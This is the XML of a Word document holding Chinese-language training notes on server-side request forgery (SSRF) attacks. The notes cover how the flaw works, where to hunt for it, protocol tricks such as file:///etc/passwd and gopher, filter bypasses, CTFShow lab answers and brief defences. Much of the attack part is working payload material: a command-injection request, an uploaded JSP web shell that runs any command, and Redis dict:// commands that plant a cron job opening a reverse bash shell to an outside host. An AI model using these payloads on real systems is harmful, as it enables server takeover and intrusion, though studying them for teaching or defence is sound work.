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B71" w14:textId="77777777" w:rsidR="007A43DD" w:rsidRDefault="007A43DD" w:rsidP="007A43DD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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>攻防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-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SSRF服务端伪造&amp;伪协议利玩法&amp;域名及IP绕过&amp;无回显利用&amp;挖掘点&amp;SRC复盘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B64BB44" w14:textId="32116C73" w:rsidR="007A43DD" w:rsidRDefault="007A43DD" w:rsidP="007A43D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B9C9B5C" wp14:editId="29F4DEBB">
            <wp:extent cx="5271770" cy="16459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08E7" w14:textId="77777777" w:rsidR="007A43DD" w:rsidRDefault="007A43DD" w:rsidP="007A43D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256F60A8" w14:textId="04989BC6" w:rsidR="007A43DD" w:rsidRDefault="007A43DD" w:rsidP="007A43DD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200C7A1" wp14:editId="3E635AA1">
            <wp:extent cx="5271770" cy="585216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E599" w14:textId="535F5AD8" w:rsidR="007A43DD" w:rsidRDefault="007A43DD" w:rsidP="007A43D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2F72F99" wp14:editId="57BB9C13">
            <wp:extent cx="5274310" cy="2462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ECE1" w14:textId="58C0FE80" w:rsidR="007A43DD" w:rsidRDefault="007A43DD" w:rsidP="007A43D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FE9DEB2" wp14:editId="5BD014F6">
            <wp:extent cx="5274310" cy="2172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A110B88" wp14:editId="154F2831">
            <wp:extent cx="5274310" cy="3081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6CD3" w14:textId="77777777" w:rsidR="007A43DD" w:rsidRDefault="007A43DD" w:rsidP="007A43D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5892A282" w14:textId="77777777" w:rsidR="007A43DD" w:rsidRDefault="007A43DD" w:rsidP="007A43D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-SSRF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利用绕过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伪协议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&amp;IP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及域名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C71367D" w14:textId="77777777" w:rsidR="007A43DD" w:rsidRDefault="007A43DD" w:rsidP="007A43D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-SSRF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挖掘思路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功能逻辑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&amp;SRC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复盘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E44040B" w14:textId="77777777" w:rsidR="007A43DD" w:rsidRDefault="007A43DD" w:rsidP="007A43D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990055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漏洞原理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服务器端请求伪造，也称为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Server-Side Request Forgery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），是因为前端用户可以输入任意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到后端服务器，而且服务器也没有对其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进行严格的过滤和校验，导致攻击者可以构造一些恶意的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让服务器去访问执行。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主要安全影响：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读取服务器本地文件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探测内网存活主机和开放端口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攻击其他内网服务器及服务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黑盒探针：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业务功能点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社交分享功能：获取超链接的标题等内容进行显示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转码服务：通过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地址把原地址的网页内容调优使其适合手机屏幕浏览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在线翻译：给网址翻译对应网页的内容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图片加载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下载：例如富文本编辑器中的点击下载图片到本地；通过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地址加载或下载图片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文章收藏功能：主要其会取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以及文本的内容作为显示以求一个好的用具体验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云服务厂商：它会远程执行一些命令来判断网站是否存活等，所以如果可以捕获相应的信息，就可以进行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网站采集，网站抓取的地方：一些网站会针对你输入的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进行一些信息采集工作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8.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数据库内置功能：数据库的比如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mongodb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copyDatabase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9.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邮件系统：比如接收邮件服务器地址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10.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属性信息处理，文件处理：比如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ffpmg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ImageMagick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pdf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处理器等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11.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未公开的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实现以及其他扩展调用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的功能：可以利用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google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语法加上这些关键字去寻找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关键参数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share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link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target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display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imageURL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domain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白盒分析：见代码审计（文件读取，加载，数据操作类的函数）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  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常见访问，如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http://127.0.0.1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file:///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从文件系统中获取文件内容，如，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file:///etc/passwd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dict://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字典服务器协议，访问字典资源，如，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dict:///ip:6739/info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sftp:// SSH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文件传输协议或安全文件传输协议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ldap://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轻量级目录访问协议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tftp://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简单文件传输协议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gopher://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分布式文档传递服务，可使用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gopherus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由于有部分协议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这类不支持，可以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来进行通讯（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redis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应用：漏洞利用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通讯相关服务的时候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Gopherus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绕过方式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限制为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http://www.xxx.com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基本身份认证的方式绕过，即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http://www.xxx.com@www.xxyy.com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限制请求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不为内网地址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当不允许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为内网地址时：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）采取短网址绕过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）采取域名解析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）采取进制转换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）采取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3XX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重定向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过滤返回信息，验证远程服务器对请求的响应是比较容易的方法。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统一错误信息，避免用户可以根据错误信息来判断远端服务器的端口状态。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限制请求的端口为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常用的端口，比如，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80,443,8080,8090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黑名单内网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。避免应用被用来获取获取内网数据，攻击内网。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禁用不需要的协议。仅仅允许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请求。可以防止类似于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file:///,gopher://,ftp://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等引起的问题。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SRF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核心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https://github.com/sqlsec/ssrf-vuls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 / HTTP/1.1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Host: 172.150.23.24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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Content-Type: application/x-www-form-urlencoded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Content-Length: 26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Origin: http://172.150.23.24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Connection: close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Referer: http://172.150.23.24/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Cookie: timezone=8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Upgrade-Insecure-Requests: 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ip=127.0.0.1%3Bcat+%2Fflag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PUT /1.jsp/ HTTP/1.1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Host: 172.150.23.26:8080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Accept: */*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Accept-Language: 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User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)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Connection: close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Content-Type: application/x-www-form-urlencoded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Content-Length: 460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&lt;%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String command = request.getParameter("cmd");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if(command != null)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java.io.InputStream in=Runtime.getRuntime().exec(command).getInputStream();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int a = -1;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byte[] b = new byte[2048];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out.print("&lt;pre&gt;");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while((a=in.read(b))!=-1)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out.println(new String(b));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out.print("&lt;/pre&gt;");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 else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out.print("format: xxx.jsp?cmd=Command");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Redis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#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清空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key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dict://172.150.23.27:6379/flushall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#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设置要操作的路径为定时任务目录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dict://172.150.23.27:6379/config set dir /var/spool/cron/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#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在定时任务目录下创建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root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的定时任务文件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dict://172.150.23.27:6379/config set dbfilename root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#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Bash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shell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payload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dict://172.150.23.27:6379/set x "\n* * * * * /bin/bash -i &gt;%26 /dev/tcp/x.x.x.x/2333 0&gt;%261\n"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#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保存上述操作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dict://172.150.23.27:6379/save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https://github.com/tarunkant/Gopherus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python2 gopherus.py --exploit mysql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root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show variables like '%plugin%'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后续编码一次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SRF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过滤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CTFSHOW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、无过滤直接获取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url=http://127.0.0.1/flag.php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2-3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地址进制绕过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十六进制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url=http://0x7F.0.0.1/flag.php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八进制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url=http://0177.0.0.1/flag.php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10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进制整数格式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url=http://2130706433/flag.php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16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进制整数格式，还是上面那个网站转换记得前缀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url=http://0x7F000001/flag.php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还有一种特殊的省略模式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127.0.0.1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127.1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CIDR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localhost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url=http://127.127.127.127/flag.php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还有很多方式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url=http://0/flag.php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url=http://0.0.0.0/flag.php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、域名解析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test.xiaodi8.com -&gt; 127.0.0.1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url=http://test.xiaodi8.com/flag.php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、长度限制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url=http://127.1/flag.php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、长度限制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url=http://0/flag.php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、利用重定向解析绕过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header("Location:http://127.0.0.1/flag.php");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url=http://47.94.236.117/xx.php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、匹配且不影响写法解析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url=http://ctf.@127.0.0.1/flag.php?show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9-10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协议打服务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参考上述工具项目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RC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EF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报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C0166" w14:textId="77777777" w:rsidR="007A43DD" w:rsidRDefault="007A43DD" w:rsidP="007A43DD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0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5EAE7301" w14:textId="77777777" w:rsidR="007A43DD" w:rsidRDefault="007A43DD" w:rsidP="007A43D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36E0B912" w14:textId="77777777" w:rsidR="00B07372" w:rsidRPr="007A43DD" w:rsidRDefault="00B07372" w:rsidP="007A43DD"/>
    <w:sectPr w:rsidR="00B07372" w:rsidRPr="007A4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214B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4C02F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63"/>
    <w:rsid w:val="00274563"/>
    <w:rsid w:val="007A43DD"/>
    <w:rsid w:val="00B0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EFCD7-0226-4DDF-A337-6AA385E6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7A43D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4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43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43D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A4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qq.com/doc/DQ3Z6RkNpaUtMcE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2025-03-29T06:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-29T06:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>